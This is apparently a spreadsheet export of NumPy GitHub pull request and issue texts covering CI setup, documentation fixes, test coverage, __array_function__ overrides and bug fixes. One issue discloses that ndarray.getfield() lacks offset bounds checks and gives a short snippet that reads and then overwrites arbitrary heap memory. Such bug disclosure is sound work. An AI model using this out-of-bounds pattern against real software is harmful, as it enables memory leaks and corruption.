EDIT: The trigger filters can be set on the pipeline, hopefully this will automatically enable CI on new maintenance branches without explicitly adding them to the filter. We cannot really test this until 1.16.x is branched._x000D_
</t>
  </si>
  <si>
    <t>TST: add Azure CI triggers</t>
  </si>
  <si>
    <t>Currently we have:_x000D_
_x000D_
* https://docs.scipy.org/doc/numpy-1.15.0/user/basics.indexing.html_x000D_
* https://docs.scipy.org/doc/numpy-1.13.0/reference/arrays.indexing.html_x000D_
_x000D_
As far as I can tell, neither reference the other. We should make them do so.</t>
  </si>
  <si>
    <t>Link between or merge the two indexing documentation pages</t>
  </si>
  <si>
    <t>Compare these [1.15 docs](https://docs.scipy.org/doc/numpy-1.15.0/reference/arrays.indexing.html) with these [1.13 docs](https://docs.scipy.org/doc/numpy-1.13.0/reference/arrays.indexing.html)</t>
  </si>
  <si>
    <t>Math no longer renders in indexing documentation</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: Documentation']</t>
  </si>
  <si>
    <t>DOC: Prepare for NumPy 1.15.3 release.</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12062._x000D_
_x000D_
The problem was OBJECT_to_* did not quit on error, and the error was cleared by subsequent calls (in PyArray_IsScalar in CDOUBLE_setitem, it seems). Probably in python3.7 they must have added a call to PyErr_Clear somewhere, which exposed this bug._x000D_
_x000D_
Fixes #11993_x000D_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</si>
  <si>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OBJECT_to_* should check for errors</t>
  </si>
  <si>
    <t xml:space="preserve">The default value for `get_num_build_jobs()` is now the number of CPUs limited to a maximum of 8. This is to prevent overloading systems with a lot of CPUs. See ticket #12087_x000D_
</t>
  </si>
  <si>
    <t>BUG: limit default for get_num_build_jobs() to 8</t>
  </si>
  <si>
    <t>Alter test to check if arrays are the same to avoid in-place modification of some array-like objects_x000D_
_x000D_
closes #11975</t>
  </si>
  <si>
    <t>BUG: Fix in-place permutation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html_x000D_
--&gt;_x000D_
This is one way to address #12107. I'm happy to implement this differently if there might be a better approach!_x000D_
_x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>BUG: Allow boolean subtract in histogram</t>
  </si>
  <si>
    <t xml:space="preserve">Fix missing DECREF before successful return._x000D_
_x000D_
Closes #12037._x000D_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</si>
  <si>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memory leak in mapping.c</t>
  </si>
  <si>
    <t>Add `multi_dot()` unit test for [uncovered code path](https://codecov.io/gh/numpy/numpy/src/master/numpy/linalg/linalg.py#L2619) where there are 2 input arrays.</t>
  </si>
  <si>
    <t>TST: test multi_dot with 2 arrays</t>
  </si>
  <si>
    <t>&lt;!--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The current depreciation message for `np.sum` references the non-existent `np.from_iter`. This corrects it to `np.fromiter`.</t>
  </si>
  <si>
    <t>MAINT: fix depreciation message typo for np.sum</t>
  </si>
  <si>
    <t>We could consider making this a public attribute of dtype objects in future, but dtype objects have enough random attributes that I'd rather not do that.</t>
  </si>
  <si>
    <t>MAINT: Move `_kind_to_stem` to `np.core._dtype`, so that it can be used as part of `dtype.__repr__`</t>
  </si>
  <si>
    <t>BUG: Prevent segfaults if python runs out of memory concatenating strings in ufunc error messages</t>
  </si>
  <si>
    <t>['00 - Bug', '25 - WIP', '55 - Needs work', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Test [uncovered](https://codecov.io/gh/numpy/numpy/src/master/numpy/linalg/linalg.py#L202) obscure `linalg` assertion function `_assertSquareness`, which is also not used at all in NumPy source._x000D_
_x000D_
We may ultimately opt for removal, but I'll aim conservatively with this PR adding tests initially.</t>
  </si>
  <si>
    <t>MAINT: remove unused `_assertSquareness()`</t>
  </si>
  <si>
    <t>Add unit test for [uncovered code path](https://codecov.io/gh/numpy/numpy/src/master/numpy/lib/histograms.py#L235) where histogram array and weights array don't have matching shapes.</t>
  </si>
  <si>
    <t>TST: add test for weighted histogram mismatch</t>
  </si>
  <si>
    <t>Testing out the Python wrapper approach._x000D_
_x000D_
xref #12028</t>
  </si>
  <si>
    <t>ENH: `__array_function__` for multiarray functions</t>
  </si>
  <si>
    <t>@njsmith is this OK by you?_x000D_
_x000D_
This is exactly https://github.com/numpy/numpy/pull/10706, but with another commit that fixes a typo, marks it as "Withdrawn" and adds the brief "Note" at the top linking to NEP-22.</t>
  </si>
  <si>
    <t>NEP 16 abstract arrays: rebased and marked as "Withdrawn"</t>
  </si>
  <si>
    <t>As discussed with @mhvk in #12140</t>
  </si>
  <si>
    <t>NEP: add notes about updates to NEP-18</t>
  </si>
  <si>
    <t>WIP: Azure testing</t>
  </si>
  <si>
    <t>['25 - WIP']</t>
  </si>
  <si>
    <t>Fixes part of #12164. I reworked the formatting of the document, added links to mailing list discussions where I could and removed references to changesets implementing `[...]` and `[()]` indexing that I could not find. The [original wiki document](https://web.archive.org/web/20100501161336/http://projects.scipy.org:80/numpy/wiki/ZeroRankArray) refers to "Multidimensional Arrays for Python" by Travis Oliphant, draft 02-Feb-2005. Did this later become the [Guide to NumPy](https://archive.org/details/NumPyBook)? Some of the email discussions on sourceforge [refer to a PEP](https://sourceforge.net/p/numpy/mailman/message/11299166/) that apparently is not [PEP 209](https://www.python.org/dev/peps/pep-0209/) since the text does not match.</t>
  </si>
  <si>
    <t>NEP: Add zero-rank arrays historical info NEP</t>
  </si>
  <si>
    <t>The text on informational NEPs is borrowed from PEP 1: https://www.python.org/dev/peps/pep-0001/#id32</t>
  </si>
  <si>
    <t>Mark NEP 22 as accepted, and add "Informational" NEPs to NEP 1</t>
  </si>
  <si>
    <t>xref https://github.com/numpy/numpy/issues/12028_x000D_
_x000D_
These turned out to be slightly easier than I expected.</t>
  </si>
  <si>
    <t>ENH: `__array_function__` for `np.einsum` and `np.block`</t>
  </si>
  <si>
    <t>The problem appears to be that `ndarray.__repr__` is mapped internally to call `np.array_repr()`:_x000D_
```_x000D_
In [1]: import numpy as np_x000D_
_x000D_
In [2]: class Sub(np.ndarray):_x000D_
   ...:     def __array_function__(*args, **kwargs):_x000D_
   ...:         return NotImplemented_x000D_
   ...:_x000D_
_x000D_
In [3]: repr(np.array(1).view(Sub))_x000D_
---------------------------------------------------------------------------_x000D_
TypeError                                 Traceback (most recent call last)_x000D_
&lt;ipython-input-6-d6ff958f4fcf&gt; in &lt;module&gt;()_x000D_
----&gt; 1 repr(np.array(1).view(Sub))_x000D_
_x000D_
~/dev/numpy/numpy/core/overrides.py in public_api(*args, **kwargs)_x000D_
    149             relevant_args = dispatcher(*args, **kwargs)_x000D_
    150             return array_function_implementation_or_override(_x000D_
--&gt; 151                 implementation, public_api, relevant_args, args, kwargs)_x000D_
    152         return public_api_x000D_
    153_x000D_
_x000D_
~/dev/numpy/numpy/core/overrides.py in array_function_implementation_or_override(implementation, public_api, relevant_args, args, kwargs)_x000D_
    108     raise TypeError('no implementation found for {} on types that implement '_x000D_
    109                     '__array_function__: {}'_x000D_
--&gt; 110                     .format(public_api, list(map(type, overloaded_args))))_x000D_
    111_x000D_
    112_x000D_
_x000D_
TypeError: no implementation found for &lt;function array_repr at 0x105692e18&gt; on types that implement __array_function__: [&lt;class '__main__.Sub'&gt;]_x000D_
```_x000D_
_x000D_
This is a somewhat poor user experience. We should map `ndarray.__repr__` to `np.array_repr.__wrapped__` instead.</t>
  </si>
  <si>
    <t>BUG: repr() broken on ndarray subclasses that define __array_function__ unless they support np.array_repr()</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: __array_function__']</t>
  </si>
  <si>
    <t>~~Add a test to trigger [uncovered path](https://codecov.io/gh/numpy/numpy/src/master/numpy/lib/index_tricks.py#L203...204) in `nd_grid` corresponding to `len` probe of empty `mgrid` instance.~~_x000D_
_x000D_
Now, just removing the unused method</t>
  </si>
  <si>
    <t>MAINT: remove unused nd_grid `__len__`.</t>
  </si>
  <si>
    <t>The Azure service is suddenly (and silently !) missing from some recent PRs that don't have much in common and shouldn't do anything that could disable Azure:_x000D_
_x000D_
#12154_x000D_
#12157 _x000D_
#12153</t>
  </si>
  <si>
    <t>TST: Azure suddenly missing from PR CI lists</t>
  </si>
  <si>
    <t xml:space="preserve">In response to #11348_x000D_
</t>
  </si>
  <si>
    <t>ENH: Add support for third-party path-like objects by backporting os.fspath</t>
  </si>
  <si>
    <t>When performing a `numpy.matmul` with a vector, whose `stride` is 0, Numpy will pass an invalid argument to the LAPACK function `DGEMV`. More specifically, the `incx` argument of `DGEMV` cannot be 0._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
a = np.array([[1., 1., 1., 1.], [1., 1., 1., 1.]])_x000D_
b = np.broadcast_to(1., (4, 1))_x000D_
np.matmul(a, b)_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
_x000D_
I tested it on 2 platforms (see the version section below)._x000D_
_x000D_
On 1.15.2 Linux:_x000D_
_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "tmp.py", line 4, in &lt;module&gt;_x000D_
    np.matmul(a, b)_x000D_
ValueError: On entry to DGEMV parameter number 8 had an illegal value_x000D_
```_x000D_
_x000D_
On 1.13.3 Windows:_x000D_
_x000D_
```_x000D_
 ** On entry to DGEMV  parameter number  8 had an illegal value_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```_x000D_
1.15.2 3.6.6 (default, Sep 12 2018, 18:26:19)_x000D_
[GCC 8.0.1 20180414 (experimental) [trunk revision 259383]]_x000D_
```_x000D_
_x000D_
and_x000D_
_x000D_
```_x000D_
1.13.3 3.5.3 (v3.5.3:1880cb95a742, Jan 16 2017, 16:02:32) [MSC v.1900 64 bit (AMD64)]_x000D_
```</t>
  </si>
  <si>
    <t>Numpy passes invalid arguments to DGEMV when stride = 0</t>
  </si>
  <si>
    <t>MAINT: Define Py_SETREF for pre-3.5.2 python and use in code</t>
  </si>
  <si>
    <t xml:space="preserve">xref #12028_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ENH: `__array_function__` for `np.core.defchararray`</t>
  </si>
  <si>
    <t>`setdiff1d` now tested for case where `assume_unique` is `True`; docs had incorrect guarantee about sorting return val too._x000D_
_x000D_
[uncovered code](https://codecov.io/gh/numpy/numpy/src/master/numpy/lib/arraysetops.py#L737).</t>
  </si>
  <si>
    <t>DOC, TST: cover setdiff1d assume_unique</t>
  </si>
  <si>
    <t>['04 - Documentation', '05 - Testing', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">Added test for np.tensordot() to test the function when there are no well defined axes present._x000D_
_x000D_
Ref: Github issue #12130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</si>
  <si>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Added tests for np.tensordot()</t>
  </si>
  <si>
    <t>['05 - Testing', '55 - Needs work', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">Add unit tests to probe [uncovered](https://codecov.io/gh/numpy/numpy/src/master/numpy/lib/utils.py#L185) code paths in `byte_bounds()` that handle both positive and negative strides in non-contiguous arrays._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>TST: byte_bounds contiguity handling</t>
  </si>
  <si>
    <t xml:space="preserve">This will probably need further revision (e.g., it should probably end in "Highlights", too), but it's a start._x000D_
_x000D_
xref #12028_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>DOC: document NEP-18 overrides in release notes</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: __array_function__']</t>
  </si>
  <si>
    <t>This is still not exception-safe, but at least there's now one instance of it to fix rather than 4</t>
  </si>
  <si>
    <t>MAINT: Move duplicated type_reso_error code into a helper function</t>
  </si>
  <si>
    <t xml:space="preserve">Complete (in the same way than done in line 8 to 14) the __cplusplus check to avoid the following warning:_x000D_
C:/numpy/core/include/numpy/ndarrayobject.h:243: Excess closing brace in C++ code (or abuse of the C++ preprocessor)_x000D_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</si>
  <si>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Update ndarrayobject.h `__cplusplus` block.</t>
  </si>
  <si>
    <t xml:space="preserve">[ci skip]_x000D_
</t>
  </si>
  <si>
    <t>DOC: minor tweak to CoC (update NumFOCUS contact address).</t>
  </si>
  <si>
    <t>The main change is replacing `try_array_function_override` with_x000D_
`array_function_implementation_or_override` (our current implementation)._x000D_
_x000D_
I also fixed a few typos._x000D_
_x000D_
@mhvk I would appreciate your review when you have the chance.</t>
  </si>
  <si>
    <t>DOC: fixups for NEP-18 based on the implementation</t>
  </si>
  <si>
    <t>['component: Documentation', 'component: NEP']</t>
  </si>
  <si>
    <t>New unit tests to target [uncovered error handling code](https://codecov.io/gh/numpy/numpy/src/master/numpy/lib/index_tricks.py#L934...941) in [`diag_indices_from()`](https://docs.scipy.org/doc/numpy-1.15.0/reference/generated/numpy.diag_indices_from.html#numpy.diag_indices_from)</t>
  </si>
  <si>
    <t>TST: error tests for diag_indices_from()</t>
  </si>
  <si>
    <t xml:space="preserve">Add error handling unit tests for [previously uncovered](https://codecov.io/gh/numpy/numpy/src/master/numpy/lib/index_tricks.py#L825...843) code in `fill_diagonal()`._x000D_
</t>
  </si>
  <si>
    <t>TST: error tests for fill_diagonal()</t>
  </si>
  <si>
    <t>Fixes #11853 by prepending the `numpy.distutil.misc_util.get_numpy_include_dirs()` to the `build_c_lib` and `build_extension` `include_dirs`._x000D_
_x000D_
Added tests that fail before, pass after the  `distutil` changes. Is there a case where using our includes will break downstream packages?_x000D_
_x000D_
@rainwoodman , @francesco-ballarin, could you test this by either cloning my branch or making the changes in `build_clib.py` and `build_ext.py` locally?_x000D_
_x000D_
Edit: add WIP label, need to figure out what lib path is missing</t>
  </si>
  <si>
    <t>WIP: BLD: prepend numpy include dirs</t>
  </si>
  <si>
    <t>['01 - Enhancement', '26 - Compiler', '57 - Close?', 'component: build']</t>
  </si>
  <si>
    <t>The return value documentation was duplicated._x000D_
_x000D_
See https://docs.scipy.org/doc/numpy/reference/generated/numpy.multiply.html - `$OUT_SCALAR_2` already contains the information.</t>
  </si>
  <si>
    <t>DOC: Remove duplicated sentence in numpy.multiply</t>
  </si>
  <si>
    <t>This PR is essentially the first commit of #12011. If you'd rather merge #12011 directly, feel free to close it. _x000D_
It is a numpy-wide refactor of pickle importing and `pickle.dump(s)` function testing. Most notably: _x000D_
* Some `pickle.dumps` tests that I did not catch in #12090 that are now looped over for every pickle protocol _x000D_
* Some refactoring about how pickle is imported internally: since we don't want a big conditional block  such as:_x000D_
```python_x000D_
if sys.version_info[0] &gt;= 3:_x000D_
    if sys.version_info[1] in (6, 7):_x000D_
        try:_x000D_
            import pickle5 as pickle_x000D_
        except ImportError:_x000D_
            import pickle_x000D_
    else:_x000D_
        import pickle_x000D_
else:_x000D_
    import cPickle as pickle_x000D_
```_x000D_
each time we import pickle in python, we import it *once* this way, in `numpy.core.numeric`, and then each time `pickle` is used in other files, we import it from `numpy.core.numeric`. The only time we import `pickle` another way is in `numpy/core/setup.py`_x000D_
_x000D_
Now, `numpy` should be clean `pickle`-wise, meaning:_x000D_
* there is no more `np.ndarray.dump(s)` call in the test suite._x000D_
* there is a consistent pickle importing behavior_x000D_
* each time pickle.dumps is tested, it is tested for every protocol.</t>
  </si>
  <si>
    <t xml:space="preserve">MAINT, TST refactor pickle imports and tests </t>
  </si>
  <si>
    <t>['03 - Maintenance', '05 - Testing', 'component: numpy.core', 'component: numpy.lib', 'component: numpy.ma']</t>
  </si>
  <si>
    <t>The `PyDataType_ISBOOL` macro still uses `_PyADt`, but that value was removed in commit [db8442b04 from 2006](https://github.com/numpy/numpy/commit/db8442b04f2b8dcc714dd974d0bd6407e9e054ef#diff-cd3f97239a111d2b450c900ff12f35a6L1392). So the macro was broken for quite a while, and nobody complained. I propose fixing it, although deleting `PyDataType_ISBOOL` entirely is another alternative.</t>
  </si>
  <si>
    <t>BUG: fix PyDataType_ISBOOL</t>
  </si>
  <si>
    <t>This seems pretty sensible to me, and should just have the offending claims in the docs removed:_x000D_
```python_x000D_
arr_0d = np.array(1)_x000D_
ret = np.tensor_dot(arr_0d, arr_0d, ([], []))  # contracting no axes is well defined_x000D_
assert (ret == arr_od).all()_x000D_
```_x000D_
_x000D_
More ambitiously, a test for this would be nice too if one does not already exist</t>
  </si>
  <si>
    <t>DOC: tensordot claims to work only on 1D arrays, but works fine for 0D too</t>
  </si>
  <si>
    <t>DOC: Improve axes shift description and example in np.tensordot</t>
  </si>
  <si>
    <t>Improving the speed of searchsorted._x000D_
_x000D_
By peeking the current item in the haystack first we roughly recover a O(n + m) algorithm instead of O(n log m) when the haystack is sorted. For small n and m it is slower._x000D_
_x000D_
This PR needs to be cleaned up, and improved. There probably are better heuristics to decide when to use O(n +m) and when to use O(n logm)._x000D_
_x000D_
Inputs are welcome._x000D_
_x000D_
Benchmarks:_x000D_
_x000D_
I am having difficulty running asv on master due to the compilation error in https://github.com/numpy/numpy/issues/11853_x000D_
_x000D_
so only a simple comparison for now._x000D_
_x000D_
After:_x000D_
```_x000D_
Previous HEAD position was eca9936d1... Add benchmark for Search._x000D_
Switched to branch 'fastersearch'_x000D_
(base) [yfeng1@waterfall numpy]$ !py_x000D_
python runtests.py --bench Search_x000D_
Building, see build.log..._x000D_
Build OK_x000D_
· Discovering benchmarks_x000D_
· Running 1 total benchmarks (1 commits * 1 environments * 1 benchmarks)_x000D_
[  0.00%] ·· Building for existing-py_home_yfeng1_anaconda3_install_bin_python_x000D_
[  0.00%] ·· Benchmarking existing-py_home_yfeng1_anaconda3_install_bin_python_x000D_
[100.00%] ··· Running bench_function_base.Search.time_1                                                                               ok_x000D_
[100.00%] ···· _x000D_
               ============ ============== ================= ================= ================= =================_x000D_
               --                                                 side / needletype / dtype                       _x000D_
               --------------------------- -----------------------------------------------------------------------_x000D_
                needlesize   haystacksize   l / sorted / f8   l / random / f8   r / sorted / f8   r / random / f8 _x000D_
               ============ ============== ================= ================= ================= =================_x000D_
                   1000          1000           14.17μs           49.62μs           12.79μs           48.18μs     _x000D_
                   1000         10000           21.90μs           81.12μs           20.60μs           79.99μs     _x000D_
                   1000         100000          82.65μs           195.03μs          82.83μs           192.62μs    _x000D_
                   1000        1000000           1.35ms            1.51ms            1.34ms            1.52ms     _x000D_
                  10000          1000           41.77μs           596.70μs          38.65μs           584.59μs    _x000D_
                  10000         10000           152.83μs          819.17μs          140.88μs          835.26μs    _x000D_
                  10000         100000          224.80μs           1.50ms           216.97μs           1.49ms     _x000D_
                  10000        1000000           2.02ms            4.08ms            2.00ms            4.15ms     _x000D_
                  100000         1000           219.59μs           5.79ms           220.17μs           5.71ms     _x000D_
                  100000        10000           436.52μs           8.18ms           391.23μs           8.07ms     _x000D_
                  100000        100000           1.82ms           14.47ms            1.63ms           14.30ms     _x000D_
                  100000       1000000           3.45ms           30.56ms            3.33ms           30.12ms     _x000D_
                 1000000         1000            2.05ms           58.13ms            2.05ms           57.47ms     _x000D_
                 1000000        10000            2.28ms           81.98ms            2.27ms           82.95ms     _x000D_
                 1000000        100000           4.71ms           145.07ms           4.58ms           143.52ms    _x000D_
                 1000000       1000000          22.75ms           266.39ms          19.95ms           267.09ms    _x000D_
               ============ ============== ================= ================= ================= =================_x000D_
```_x000D_
before_x000D_
```_x000D_
HEAD is now at eca9936d1... Add benchmark for Search._x000D_
(base) [yfeng1@waterfall numpy]$ !p_x000D_
python runtests.py --bench Search_x000D_
Building, see build.log..._x000D_
Build OK_x000D_
· Discovering benchmarks_x000D_
· Running 1 total benchmarks (1 commits * 1 environments * 1 benchmarks)_x000D_
[  0.00%] ·· Building for existing-py_home_yfeng1_anaconda3_install_bin_python_x000D_
[  0.00%] ·· Benchmarking existing-py_home_yfeng1_anaconda3_install_bin_python_x000D_
[100.00%] ··· Running bench_function_base.Search.time_1                                                                               ok_x000D_
[100.00%] ···· _x000D_
               ============ ============== ================= ================= ================= =================_x000D_
               --                                                 side / needletype / dtype                       _x000D_
               --------------------------- -----------------------------------------------------------------------_x000D_
                needlesize   haystacksize   l / sorted / f8   l / random / f8   r / sorted / f8   r / random / f8 _x000D_
               ============ ============== ================= ================= ================= =================_x000D_
                   1000          1000           14.40μs           55.83μs           14.14μs           51.88μs     _x000D_
                   1000         10000           22.96μs           85.93μs           23.58μs           83.82μs     _x000D_
                   1000         100000          89.63μs           195.00μs          90.94μs           193.37μs    _x000D_
                   1000        1000000           1.24ms            1.40ms            1.24ms            1.40ms     _x000D_
                  10000          1000           125.83μs          585.63μs          124.70μs          574.02μs    _x000D_
                  10000         10000           161.67μs          822.46μs          163.26μs          816.22μs    _x000D_
                  10000         100000          249.13μs           1.49ms           243.95μs           1.47ms     _x000D_
                  10000        1000000           2.08ms            4.25ms            1.97ms            4.22ms     _x000D_
                  100000         1000            1.13ms            5.83ms            1.15ms            5.72ms     _x000D_
                  100000        10000            1.61ms            8.15ms            1.61ms            8.08ms     _x000D_
                  100000        100000           1.96ms           14.29ms            1.96ms           14.34ms     _x000D_
                  100000       1000000           3.77ms           29.60ms            3.64ms           29.72ms     _x000D_
                 1000000         1000           11.11ms           58.44ms           11.27ms           57.28ms     _x000D_
                 1000000        10000           15.09ms           81.65ms           15.39ms           80.74ms     _x000D_
                 1000000        100000          20.13ms           144.49ms          19.97ms           143.42ms    _x000D_
                 1000000       1000000          24.42ms           264.65ms          24.61ms           263.74ms    _x000D_
               ============ ============== ================= ================= ================= =================_x000D_
_x000D_
_x000D_
```</t>
  </si>
  <si>
    <t>WIP: Improve the speed of searchsorted.</t>
  </si>
  <si>
    <t xml:space="preserve">@eric-wieser [requested](https://github.com/numpy/numpy/pull/12109#pullrequestreview-162767017) additional test cases for `test_issctype()`._x000D_
_x000D_
There's still a small [uncovered code path](https://codecov.io/gh/numpy/numpy/src/master/numpy/core/numerictypes.py#L225...233) in the tested function, but causing `issctype()` to raise the `Exception` that triggers that path seems tricky without some sophisticated mocking._x000D_
</t>
  </si>
  <si>
    <t>TST: expand cases in test_issctype()</t>
  </si>
  <si>
    <t>Fixes #12095. Refactor the major sections of handling floatstatus to make `fenv.h` semantics the default._x000D_
_x000D_
In more words, floatstatus handling uses `#ifdef` macros to choose one of:_x000D_
_x000D_
- GLIBC and others (use `fenv.h`)_x000D_
- sun, BSD (uses `ieeefp.h`)_x000D_
- AIX (uses `fpxcp.h`)_x000D_
- MSVC or osf/alpha (need no special includes, set an internal status via overflow/underflow/inf detection)_x000D_
_x000D_
Before this PR, the last block was the default. Alpine linux uses musl libc. Musl has no macro to detect its presence, but it uses `fenv.h`semantics. Rearranging the blocks to make `fenv.h` the default enables correct behaviour._x000D_
_x000D_
~Still a WIP since the original reporter reports an [unused function warning](https://github.com/numpy/numpy/issues/12095#issuecomment-428264316) during build.~_x000D_
_x000D_
Looking at the diff makes it difficult to see what I did, so here is a summary with links to the beginning of the old (as in 1.15.2 tagged code) / new (this PR) code blocks_x000D_
_x000D_
Block | was | old lines | now | new lines_x000D_
--------|--------|------|------|--------_x000D_
Solaris | 1 | [578](https://github.com/numpy/numpy/blob/v1.15.2/numpy/core/src/npymath/ieee754.c.src#L578) - 629 | 1 | [586](https://github.com/numpy/numpy/blob/367f05/numpy/core/src/npymath/ieee754.c.src#L586) - 636_x000D_
GLibc (`fenv.h`) | 2 |[630](https://github.com/numpy/numpy/blob/v1.15.2/numpy/core/src/npymath/ieee754.c.src#L630) - 684 | 4| [787](https://github.com/numpy/numpy/blob/367f05/numpy/core/src/npymath/ieee754.c.src#L787) - end_x000D_
AIX | 3 | [685](https://github.com/numpy/numpy/blob/v1.15.2/numpy/core/src/npymath/ieee754.c.src#L685) - 731 | 2 | [637](https://github.com/numpy/numpy/blob/367f05/numpy/core/src/npymath/ieee754.c.src#L637) - 683_x000D_
MSVC, osf alpha | 4 | [732](https://github.com/numpy/numpy/blob/v1.15.2/numpy/core/src/npymath/ieee754.c.src#L732) - end | 3 | [684](https://github.com/numpy/numpy/blob/367f05/numpy/core/src/npymath/ieee754.c.src#L684) - 786_x000D_
_x000D_
Edit: no longer a WIP</t>
  </si>
  <si>
    <t>BUG: refactor float error status to support Alpine linux</t>
  </si>
  <si>
    <t>['00 - Bug', '01 - Enhancement', 'component: build', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Closes #4701 (issue). Closes #11856 (PR). Closes #10256 (PR). Closes #10659 (PR)._x000D_
_x000D_
This issue was labelled "easy" which led to the multiple PRs to fix it. I propose to deprecate it instead, as it is neither used nor tested in numpy, and is a thin wrapper to [`ndarray.item()`](http://www.numpy.org/devdocs/reference/generated/numpy.ndarray.item.html) but accepts none of the `args`._x000D_
_x000D_
SciPy does not use `asscalar`, astropy has two uses of `asscalar` which would need fixing.</t>
  </si>
  <si>
    <t>DEP: deprecate asscalar</t>
  </si>
  <si>
    <t>&lt;!--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Curerntly _x000D_
```python_x000D_
&gt;&gt;&gt; arr = np.array([1, 2, 3])_x000D_
&gt;&gt;&gt; arr_ref = arr_x000D_
&gt;&gt;&gt; arr.resize(100)_x000D_
```_x000D_
causes this error._x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
ValueError: cannot resize an array that references or is referenced_x000D_
by another array in this way.  Use the resize function_x000D_
```_x000D_
But, I feel it odd to tell users to use `resize`, when `resize` fails.</t>
  </si>
  <si>
    <t>MAINT: Clarify the error message for resize failure</t>
  </si>
  <si>
    <t>Add support for modulus operator when both operands_x000D_
are `timedelta64` ~~with seconds units, and no other cases.~~_x000D_
_x000D_
Related to #12092, though doesn't fully cover the modulus_x000D_
scenarios requested there because I haven't added a branch_x000D_
for modulus `timedelta64` with a Python integer._x000D_
_x000D_
~~I think this approach can be summarized as intercepting the_x000D_
array `nb_remainder` slot function before it dispatches to_x000D_
the ufunc machinery.~~</t>
  </si>
  <si>
    <t>ENH: add timedelta modulus operator support (mm)</t>
  </si>
  <si>
    <t xml:space="preserve">xref #12028_x000D_
_x000D_
np.lib.npyio through np.lib.ufunclike_x000D_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</si>
  <si>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`__array_function__` support for `np.lib`, part 2/2</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: __array_function__', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">xref #12028_x000D_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</si>
  <si>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`__array_function__` support for `np.fft` and `np.linalg`</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: __array_function__', 'component: numpy.fft', 'component: numpy.linalg']</t>
  </si>
  <si>
    <t xml:space="preserve">xref #12028_x000D_
_x000D_
np.lib.arraypad through np.lib.nanfunctions_x000D_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</si>
  <si>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`__array_function__` support for `np.lib`, part 1/2</t>
  </si>
  <si>
    <t xml:space="preserve">With the notable exceptions of np.einsum and np.block._x000D_
_x000D_
xref #12028_x000D_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</si>
  <si>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`__array_function__` support for most of `numpy.core`</t>
  </si>
  <si>
    <t>Closes #12105. `getfield` is a version of `view` that allows viewing the data block through a different dtype with an optional offset. This PR prevents the new dtype and offset from accessing invalid data.</t>
  </si>
  <si>
    <t>ENH: check getfield arguments to prevent invalid memory access</t>
  </si>
  <si>
    <t>['00 - Bug', '01 - Enhancement', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Add a unit test for [uncovered](https://codecov.io/gh/numpy/numpy/src/master/numpy/core/numerictypes.py#L191) `issctype`.</t>
  </si>
  <si>
    <t>TST: add unit test for issctype</t>
  </si>
  <si>
    <t xml:space="preserve">There is a not yet understood problem in testing f2py C modules (*.pyf)_x000D_
files on the Mac that manifests as erratic module import failures._x000D_
This disables those tests until we can figure out what the problem is._x000D_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</si>
  <si>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MAINT: Skip some f2py tests on Mac.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
`ndarray.getfield()` does not verify the offset to prevent accessing out-of-bounds memory._x000D_
Interestingly, older versions of numpy DID check this, but the check was removed in df959ed7c45a923c59b6bb3ebbb4bc0b7c73df58 and never re-added since._x000D_
_x000D_
This bug is potentially exploitable in any tool built on top of numpy that uses a `.getfield` offset from an untrusted source, or otherwise might lead to confusing issues due to silent memory corruption._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
arr = np.array([0] * 32, "uint8")_x000D_
view = arr.getfield("uint8", -2048) # both negative and positive offsets work_x000D_
print(view);_x000D_
# random view of Python's heap, in this execution it was:_x000D_
# [102   2 100   7 100   8 102   2 100   9 100  10 102   2 100  11 100  10_x000D_
#  102   2 100  12 100  13 102   2 100  14 100  15 102   2]_x000D_
view[:] = 0 # unpredictable memory corruption_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
_x000D_
None! Which is exactly the issue_x000D_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Python 3.6.6 (default, Jun 27 2018, 05:47:41) [GCC 7.3.0], Numpy 1.15.2_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ndarray.getfield() does not check that the offset is sane</t>
  </si>
  <si>
    <t>MAINT: Add azure-pipeline status badge to README.md</t>
  </si>
  <si>
    <t>Add unit test to explore [untested paths](https://codecov.io/gh/numpy/numpy/src/master/numpy/lib/index_tricks.py#L144) in `nd_grid` class.</t>
  </si>
  <si>
    <t>TST: improve coverage of nd_grid</t>
  </si>
  <si>
    <t>They should have the same signature as the decorated function._x000D_
_x000D_
Note: eventually these checks should be optional -- we really only need them to be run as part of NumPy's test suite, not every time numpy is imported.</t>
  </si>
  <si>
    <t>ENH: Validate dispatcher functions in array_function_dispatch</t>
